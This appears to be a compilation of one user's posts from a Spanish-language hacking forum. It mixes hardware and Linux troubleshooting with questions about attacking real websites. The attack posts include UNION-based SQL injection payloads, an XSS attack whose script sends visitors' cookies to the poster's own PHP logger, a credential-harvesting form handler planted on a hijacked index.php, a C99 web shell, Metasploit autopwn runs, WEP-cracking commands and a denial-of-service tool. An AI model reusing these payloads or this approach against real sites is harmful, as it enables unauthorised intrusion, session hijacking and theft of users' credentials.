Temas

[adds\_adds:]

Antes que todo, darle las gracias a los que me han ayudado en esto, tanto como los manuales y a los que se han dado la molestia de poner en mi frente los link  

Bueno les cuento he quedado con algunas dudas, comento:

Encontré 2 secuencias para saber los privilegios de usuario

SENTENCIA NUMERO 1

Código [Seleccionar] Expandir

-1+union+all+select+1,concat(grantee,0x3a,table_schema,0x3a,privilege_type),3,4+FROM+information_schema.schema_privileges--

Este me arroja datos como:

Código [Seleccionar] Expandir

adds_user@localhost:adds\_adds:SELECT

1-¿esto quiere decir que el usuario adds tiene privilegios SELECT?
y adds\_adds: que es?

SENTENCIA NUMERO 2

Código [Seleccionar] Expandir

-1+union+all+select+1,concat(grantee,0x3a,privilege_type,0x3a,is_grantable),3,4+from+information_schema.user_privileges--

Este me arroja un solo dato que es:

Código [Seleccionar] Expandir

add_user'@'localhost':USAGE:NO

2-¿Que diferencia tiene esta sentencia con la 1era?

Les agradecería demasiado que me explicaran tales sentencias... gracias

3-para obtener un dato de una columna utilizo esta sentencia

Código [Seleccionar] Expandir

-1 union all select 1,column_name,3,4 from information_schema.columns where table_name = char(x,x,x) and column_name like char(x,x,x)

en donde x son valores ascii como a=97

¿está bien la secuencia?,¿por qué me arroja una respuesta en blanco?

Hola a todos, haré unas preguntas que en ningún lado las he podido topar, osea las saco por deducción pero prefiero que alguien me las corrobore

dentro de la inyección SQL existen dos tipos Blind SQL e inyección SQL a travez de formularios (Login)

1-¿La inyección BLIND es por medio del navegador web, es decir id='?
(me muevo a travez de la barra del navegador(refiriendome a la explotación)

2-la por medio de formularios, ¿funciona solo en login.ASP?

3-En que varia el tipo de BD (MySQL,Oracle,etc) en el momento de inyectar

4-Si varía, ¿esto es solo en blind inyection?

5-¿De que maneras puedo saber que BD posee un servidor web, a travez de sentencias SQL?


Muchas gracoas

[']

Hola a todos, les cuento estoy haciendo un injector de sql y me gustaría saber como puedo saber que BD usa una web

que petición debería realizar?, no sé nada de base de datos :c

injectable.php?='

Qué debería poner en ves de ' para saber que BD utiliza, gracias de ante mano


EDIT: He notado las bases de datos se dividen en este esquema
Base de datos->Tablas->Columnas->datos

Mi pregunta es atraves de que forma metodo de injección SQL puedo obtener cada una de esa estructura gracias

Hola a todos bueno hace un poco adquirí un netbook acer one sin batería por lo que decidí comprarla luego de eso me di cuenta que no cargo lo deje toda la noche y solo me salia en el lado izquierdo del netbook una luz de color naranja parpadeante en cada momento


*La nota interesante, revisé el voltaje no sé mucho pero con ese aparato de volteos
el cargador me mostraba harto ya que fue hace tiempo al igual que el cargador pero al hacerlo en la entrada del netbook es decir en el lugar en donde se pone la batería claramente sin ella y obviamente el ntebook conectado a corriente me marcaba 12 o menos por lo que el cambio era demasiado en comparación a lo otro

a que se puede deber?


gracias

Hola a todos bueno les comento, hace unos días reinstalé debian pero por defecto puse un repositorio que es menos actual que el oficial tanto así que en el centro de sofware no encontraba algunas herramientas ahora me sorprendo denuevo por que me he fijado que el driver de wifi no va muy bien, aveces se cae... por lo que me extraña sinceramente ya que lo he instalado tal como siempre, con la única diferencia que esta ves puse un repositorio cercano a mi localidad

mi pregunta en conclución, es ¿como puedo actualizar mis drivers especificamente el de wifi con el nuevo repositorio que ahora tengo(debian oficial repository)?


desde ya gracias

Hola a todos, bueno anteriormente al instalar debian iba a centro de sofware y aparecia ettercap automáticamente, pero ahora al entrar no está, que debo hacer?

hago sudo apt-get install ettercap-gdk pero al instalarse no me va bien, recuerdo que al hacerlo desde el centro de sofware se instalaba otro paquete que decia (funcionamiento para ettercap algo así) por lo que ahí me funcionaba

PD ya instalé:
libnet0_1.0.2a-7_i386.deb
sudo apt-get install libnet0 libnet1-dev libssl-dev libltdl3-dev libpcre3-dev libpcap0.8-dev


gracias

Hola a todos, bueno tengo unas duda un poco tonta pero la haré solo por saber

tengo un disco duro particionado en

[-----------------------|-----------------]
  Windows 7                Debian


Si borro toda la parte de linux... dejandolo como espacio no asignado y luego ejecuto supergrub

[-----------------------|-----------------]
  Windows 7                Espacio sin asignar

¿no quedan residuos?, en el sentido algunos archivos que más que nada quiero tener una instalación limpia (borrar todo lo de debian dejandolo como no asignado, para después instalarlo denuevo desde 0)

Gracias

Hola a todos espero que estén bien, bueno les cuento indagando por una base de datos... he podido adiquirir algunas columnas casi todas me devuelven los datos

Pero hay una que me devuelve este error:

Turning off 'bypass illegal union' and retrying!

por lo que fui a settings->bypass illegal union y lo desactivé

pero el problema todavía persiste , ¿a qué se debe esto?,¿como lo soluciono?,¿funcionará con otro injecctor?,si es así ¿cual uso?

Desde ya muchisimas gracias por leer mi duda

PD: e buscado por internet la versión full no importa la versión, pero no encuentro uno 100% full ya que los pro o full que encuentro no me dejan injectar en bases de datos ORACLE :c

Hola a todos soy sincero en esto, obtuve una BD por medio de injección SQL mi duda es como puedo ver la columna PASS ya que esta está cifrada

¿que metodo de encryptación tiene?,¿Que tipo de metodos de cifrado se les puede poner?

Aclaro que es solo por curiosidad no pretendo sacar provecho... busco una soluciones e indago

les dejo una pass para ver que cifrado tiene:

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

desde ya gracias

LO ENCONTRÉ JEJE EDIT:

http://foro.elhacker.net/php/desencriptar_passwords_de_mysql-t314244.0.html

[Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/hola.php on line 9]

Hola a todos, he estado haciendo unos análisis una página y me aparece esto:

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/hola.php on line 9

Bueno tan solo abriendolo directo me marca tal error, haciendo pruebas hago lo

siguiente: www.hola.cl/hola.php?id='

me marca lo mismo, luego:

www.hola.cl/hola.php?id=-1+union+select+1

comienzo a agregarle:
,2

,3

,4

así sucesivamente pero no me marca ningún error sigue tal cual... por lo que averigüe es que debería marcarme un error ¿está bien eso?

desde ya gracias

Hola a todos bueno haciendo pruebas en páginas encontré una que al poner ID '
me arroja esto:


Autenticando usuario...
Error: ORA-01756: quoted string not properly terminated

Error: java.sql.SQLException: ORA-01756: quoted string not properly terminated


¿Es vulnerable esta página?

Hay alguna forma para sniffear páginas flash?
Gracias

Hola a todos bueno mi duda es tal como aparece en el título, puedo reenviar un header post captuardo con el wireshark? utilizo temper data o header live http pero no reconoce el método post...
gracias

[POST]

Hola, les cuento quizás no me expreso bien

Quiero lograr captar la cabecera POST de una página que tiene la opción de subir archivos(el upload está en flash) utilizando TEMPER DATA o LIVE HTTP HEADER

pero estos programas no me encuentran la cabecera POST solo volviendo una GET que revisando es el header que viene a continuación, en otras páginas sí pero en está lo quiere encontrar.

¿De que manera puedo obtener tal cabezera,algún programa o otro addons?

Muchas gracias

Hola a todos bueno estoy haciendo unos análisis en una página
esta tiene un upload que está en flash por lo que al elegir la opción subir, cuando elijo lo que quiero subir automáticamente después de la elección empieza a subir (no aparece algún botón o algo así)

el problema surge cuando con los addons temper data o live http header viewer no encuentra la petición post, existirá alguna forma con otro addons o de alguna manera visualizar esa petición

(los addons en otras páginas funcionan de maravilla pero con los upload en flash no reconoce el POST

muchas gracias

Bueno Hola a todos espero que estén bien, les cuento tengo un comando que útilizo en linux es más o menos así

xxxxxx 192.168.0.1

el problema surge que me gustaria para poder facilitar mi trabajo crear un variable más o menos así

xxxxxx 192.168.0.X

en donde X=son numeros desde el 1 hasta el 255

creo que es algo demasiado facil, pero no sé nada de .sh si pudieran tenderme solo esa mano se los agradeceria Muchas gracias

Hola a todos bueno les cuento el pequeño detalle más que nada
nessus me va de lujo en un PC de casa pero en mi netbook.. usando debian no me aparece el
"subir y bajar de página" dentro del scanneador, esto también me sucede en windows 7 por lo que descarto que sea por el Sistema operativo, mi pregunta se puede de alguna manera solicionar esto
mi idea sería editar la página flash del nessus, si es así adonde se encuentra, no manejo mucho linux
desde ya muchas gracias

Hola a todos espero que estén muy bien, bueno les cuento decidí denuevo instalar el backtrack pero esta vez en otro computador que tengo (netbook acer aspire one)
el problema me surge que el instalador manual me da problemas por lo que decidí instalarlo manualmente, pero el problema surge en:
Windos genera dos discos duros uno el del sistema y otro de 100mb que es para el boteo por lo que me quedan 2 particiones primarias (tengo entendido que el máximo son 4) por lo que me surge que no puedo instalar una de raiz,home y swap
no recuerdo como lo hice anteriormente, si me pudieran ayudar se los agradeceria
gracias

[vulnerabilidad xss]

Hola a todos bueno les cuento estaba un poco aburrido y se me ocurrió indagar un poco y retomé con los xss y encontré una página con una vulnerabilidad xss
pero no en su buscador si no que en una parte para hacer login (Exactamente en la ID)
al momento de logearme erroneamente (poniendo una ID falsa y una clave) me marcaba el usuario xxx no existe, por lo que probé con codigos htm y walá tenia xss
así que preparé el escenario.. Subi mi cookie.php (http://lapaginaquetengo.com/cookies.php) con el siguiente código

Código [Seleccionar] Expandir

<?
$cookie = $_GET['cookie'];
$fff = fopen("datos.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>

la petición:

Código [Seleccionar] Expandir

http://paginaconxss/cmol2008/serv/Iconsystem.Login?P_USUARIO=<script>window.location='http://paginamiaconcookie.com/cookies.php?cookie='+document.cookie;</script>&P_PASS=default&Submit=Aceptar

Pero al hacer las pruebas me Devuelve:

java.sql.SQLException
ORA-00907: missing right parenthesis

Y peor no se crea datos.txt con la información
La página tiene centos,está bajo Oracle y apache 2.2.3
Espero su ayuda muchas gracias por tomarse el tiempo de leer

EDIT:Buscando por internet, lei algo como colocar esto:

Código [Seleccionar] Expandir

<script src=Http://host.com/javascript.js></script>
Cuando cargo la página introduciendo el script que mencioné anteriormente me sale que está cargando host.com/... por lo que creo que este método es factible corriganme si me equivoco, pero el problema surge en ¿que codigo.js debo colocar para poder adquirir la cookie del visitante?, si alguien me lo pudiera explicar se lo agradeceria, muchas gracias

EDIT2:
Encontré un codigo en js
hice lo siguiente:

Código [Seleccionar] Expandir


<script language="javascript">
document.location="http://paginaquetengo.com/cookies.php?cookie=" + document.cookie;
</script>                                                                          

1-Lo guardé como login.js en http://paginaquetengo.com/login.js
junto con el cookie.php que anteriormente mencioné (http://lapaginaquetengo.com/cookies.php)
2-introducí en la página prueba:

Código [Seleccionar] Expandir

http://paginaconxss/cmol2008/serv/Iconsystem.Login?P_USUARIO=<script src=http://paginaquetengo.com/login.js></script>&P_PASS=default&Submit=Aceptar

Carga diciendo usuario no existe, verifico mi página pero esta no tiene el log (la página tiene la opción de escritura habilitada)

Espero ansiosamente su ayuda gracias x.x

[packard bell dot se]

Hola a todos bueno espero que estén bien les cuento mi triste y desesperada historia
Hace un poco un familiar mio adquirió(nuevo) un packard bell dot se
es uno rozado pueden verlo a continuación


noté que traia windows seven starter (en este todo corria a la perfección), por lo que le instale el windows 7 últimate
(instalé ese SO por que esa pc no es mia)
el problema surgió cuando empezé a buscar el driver de wifi al momento de instalarlos queda la luz del wifi naranja (siendo que esta debería ser azul),en otras ocasiones parpadea una luz naranja(cuando instalaba driver de versiones más antiguas),de las dos formas no reconoce ninguna red wifi,enumero lo que hice:

Edito:En dos ocasiones reconoció el wifi al reiniciarlo pero este se me cayó volviendome a aparecer denuevo las barritas de wifi con una cruz roja

1-busque al reverso el modelo del widi y sale : WLAN module Atheros AR5B95
2-me metí en la página de packard bell para buscar el driver, lo encontré pero este NO funcionó
se llamaba: Wireless LAN_Atheros_W7
3-fui a la página de acer buscando un modelo que tuviera la misma tarjeta wifi
4-seguí buscando por todo internet buscando versions distintas pero tamoco
5-entré a una página que estaban todos los driver de atheros de manera no oficial
www.atheros.cz creo que era esa
6-probé con el driver de windows xp,vista
7-(cada ves que instalaba el driver apagaba el wifi y después lo prendía)

Noté en un foro que una persona también le ocurrio,porfavor si alguién a podido solucionar eso o sabe como repararlo se lo agradezco demasiado

[Como aumentar el flujo de datos de un cliente ya conectado?]

Hola a todos bueno estoi haciendo pruebas en mi red wifi
y claro e encontrado por todos lados tutoriales de como descifrar claves wep pero siempre con el metodo:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (interfase virtual)

y luego aumentando el flujo con:

aireplay-ng -3 (interfase virtual) -b (bssid) -h 00:11:22:33:44:55 -x 300

pero mi duda es mas basica

Como aumentar el flujo de datos de un cliente ya conectado?


buscando por internet encontre esto:

aireplay-ng -3 (interfase) -b (bssid) -h (STATION) –x 300

pero claro cuando ejecuto el comando me arroja esto:

The interface MAC (00:11:22:33:44:55) doesn't match the specified MAC (-h).
        ifconfig wlan0 hw ether 00:1E:65:CE:XX:XX
15:30:20  Waiting for beacon frame (BSSID: 00:26:5A:27:XX:XX) on channel 1
Saving ARP requests in replay_arp-0731-153020.cap
You should also start airodump-ng to capture replies.
^Cad 41 packets (got 3 ARP requests and 6 ACKs), sent 1468 packets...(700 pps)

me da a entender que esta mal especificada por que mi mac fake es 00:11:22:33:44:55

siguiendo con el procedimiento  genero mas paquetes con:

aireplay-ng -0 1 -a (bssid) -c (STATION) (interfase)

luego empiesa a enviar demasiados paquetes pero no aumenta los datas

intente modificar el codigo de esta manera:

aireplay-ng -3 (interfase) -b (bssid) -c (STATION) –x 300

pero al hacer esto no marca el error pero me sale got 0 ARP y 0 ACK

me encantaria mucho que me instruieran a como descifrar una con un cliente conectado...

gracias

Hola a todos bueno les cuento tengo instalado ubuntu 9.10 en mi computador y me va de lujo pero
me el problema que tengo es que cuando se prende carga el grub, aparce el simbolo de ubuntu normalmente pero despues de eso aparece la pantalla negro por unos 3 segundos y sale ubuntu desktop ttyp1 pidiendome que ponga login y pass luego sigue normal y aparece la ventana para Iniciar sesion en modo grafico normal
mi duda es como puedo eliminar esa pantalla negra que me pide login y pass siendo que desaparece y no necesito usarla?

gracias

[0]

Hola a todos bueno usando metasploit y hago lo siguientel;
db_create
db_import_nessus_xml /home/xxxr/Escritorio/2.nessus
db_vulns

• Time: Sun May 30 02:58:28 UTC 2010 Vuln: host=xxx.xx.xx port=8090 proto=tcp name=NSS-0 refs=
  
• Time: Sun May 30 02:58:32 UTC 2010 Vuln: host=xxx.xx.xx port=8090 proto=tcp name=NSS-34970 refs=CVE-2009-3099,CVE-2009-3548,CVE-2010-0557,BID-36253,BID-36954,BID-37086,BID-38084,OSVDB-57898,OSVDB-60176,OSVDB-60317,OSVDB-62118
  
  luego uso el comando db_autopwn con esto -t -e -x (agrego -t -e -x por un manual no entiendo eso)
  y me arroja esto:
  
• ================================================================================
  
•                             Matching Exploit Modules
  
• ================================================================================
  
•   xxx.xxx.xxx.xx:12090  exploit/multi/http/tomcat_mgr_deploy  (OSVDB-60317)
  
• ================================================================================
  
• 
  
• 
  
• (1/1 [0 sessions]): Launching exploit/multi/http/tomcat_mgr_deploy against xxx.xxx.xx:12090...
  
• (1/1 [0 sessions]): Waiting on 1 launched modules to finish execution...
  
• (1/1 [0 sessions]): Waiting on 0 launched modules to finish execution...
  
• The autopwn command has completed with 0 sessions
  
  y luego pongo
  
  msf > sessions
  
  Active sessions
  ===============
  
  No active sessions.
  
  NO entiendo eso de sessions si alguien podria explicarmelo de echo no se que estoi haciendo solo se que metasploit esta interpretando los resultados de nessus y luego los lanza mi duda es que por que no funciona es por que dice session 0? porfavor gracias
  
  EDIT: investigando creo que en UBUNTU no funciona muy bien este comando, Creo entender las sessions si el exploit funciono deberia haber sessions?, si me equivoco correjirme
  
  Ahora mi nueva duda es como elegir los payloads que entega  funcionan todos? si el servidor corre en windows y elijo un payloads que parte con windows/ da igual cual SO sea (windows 98,XP,windows NT)?

Hola a todos, escaneo webs con nikto y me arroja algunas alertas al igual que con acunetix pero mi duda es como las busco con metasploit me refiero al nombre ya que este lo ejecuto en modo web y al buscar el exploit no me encuentra casi nada muchas gracias

[(!C99Shell v. 1.0 pre-release build #16!)]

Hoola a todos bueno les cuento e logrado subir una shell (!C99Shell v. 1.0 pre-release build #16!) pero mi problema es que no logro tener acceso a la base de datos,use el
SQL Manager del phpshell y no logro conectarme,e intentado con el puerto default 3306 y me aparece acceso denegado pero tengo entendido que la base de datos a la cual me quiero conectar corre por el puerto 1433, cuando cambio a ese puerto se queda dando vueltas y aparece esto:

Can't connect
Lost connection to MySQL server during query

mi pregunta es de que forma puedo tener el acceso a las base de datos?
existe algun cliente en PHP que se conecte a la BD
posible conexión remota de MYSQL 2000
si es asi de que manera pudo activar

:SERVER STATUS

corre bajo MYSQL SERVER 2000
sistema operativo WINDOWS XP

porfavor necesito su ayuda gracias


________________________________

en mi pc implemtento la misma base de datos y al igual no logro entrar la phpshell me deja el siguiente mensaje probando con el puerto 1433 y 3306

SQL Manager:
Can't connect
Can't connect to MySQL server on 'localhost' (10061)

Porfavor ayuda :G

saludos

[index.php]

Hola a todos bueno les cuento tengo una duda lo que pasa es que logre tomar el control de un index.php y quiero editar el <form method="post" ACTION=datos.php

el codigo de datos.php pienso ponerle esto:

Código [Seleccionar] Expandir

<?php
header ('Location: http://www.web.com/ ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

pero si ago lo anterior ningun usuario podria autentificarse ya que solamente guardaria los datos y despues lo redireccionaria a otra web 
me gustaria que redireccionara autentificado,existe alguna manera para que se guarden los datos del form o que se intercepten y que despues se logue?
si me pudieran explicar un poquito se los agradeceria demasiado

desde ya gracias

Hola a todos bueno e estado investigando acerca de esta vulnerabilidad,e podido explotarla en una web y me entrega todos los usarios e informacion que tienen,pero tengo unas dudas

por lo que leido

1-¿uno puede explorar el pc del servidor? o solamente me entrega los usuarios del el server



2-si es así como me muevo? es por el navegador?


3-por lo que se las claves de las cuentas no quedan guardadas en /etc/passwd sino quedan guardadas en un /etc/passwd/shadow se supone que solo el root puede tener acceso a dicha carpeta


cuando use el exploit no me aparecio ese directorio esto es por causa de que no lo tiene,por que solamente queda guardada en /etc/passwd o me equivoco??

4-si solamente me entregara los usarios del pc,¿como puede tener acceso al servidor osea entrar para loguearme (que puerto por donde)?

5-¿existe algun bruteforce para poder entrar al servidor?

6-¿que diferencia una cuenta login de una nologin?


Porfavor espero una respuesta a mis dudas xD Muchas Gracias,por tomarse el tiempo en leer este post lleno de duas

Hola a todos bueno les cuento me estoy iniciando en visual basic recien aprendi lo q era una variable xd un msgbox y peuqeñas cosas mas bueno les cuento estoy tratando de hacer una aplicacion que haga lo siguiente
1-escribir un texto en una pagina web y luego presionar el boton de enviar de la web

busque por internet comandos y lo ise de esta forma

Private Sub Command1_Click()
WebBrowser1.Navigate "http://apps.new.facebook.com/guerra-de-pandillas/discussion.php"
WebBrowser1.Document.All.Item("wall_text").Value = Text1.Text
WebBrowser1.Document.All.Item("inputsubmit").Click
End Sub


El problema es que me marca un error 424 dice que falta un objeto

Porfavor necesito su ayuda,les pide que si tengo que agregar un comando mas o otra cosa que me explique que hace tal comando ya que mi idea es aprender no copiar y pegar sources ^^

Gracias

Hola a todos bueno tengo una gran duda mas que nada no es para mi sino un amigo que sabe programar y todo Bueno les cuento mi amigo a creado una aplicacion pero le gustaria que se pudiera ejecutar por cmd/shell como los exploit en perl algo asi y que desde hay mismo se pudiera configurar
ej:"aplicacion.exe 900 -t

hay algun manual para eso?
Gracias

PD:el programa es para hacer ataques de denegacion de servicios

Muchas Gracias Adios

Hola a todos Bueno quiero Hacer lo siguiente en mi batch pero no se como xD

Aqui va


Quiero crear automaticamente un documento.inf y que este dentro ya tenga escrito algo

Es posible en batch Gracias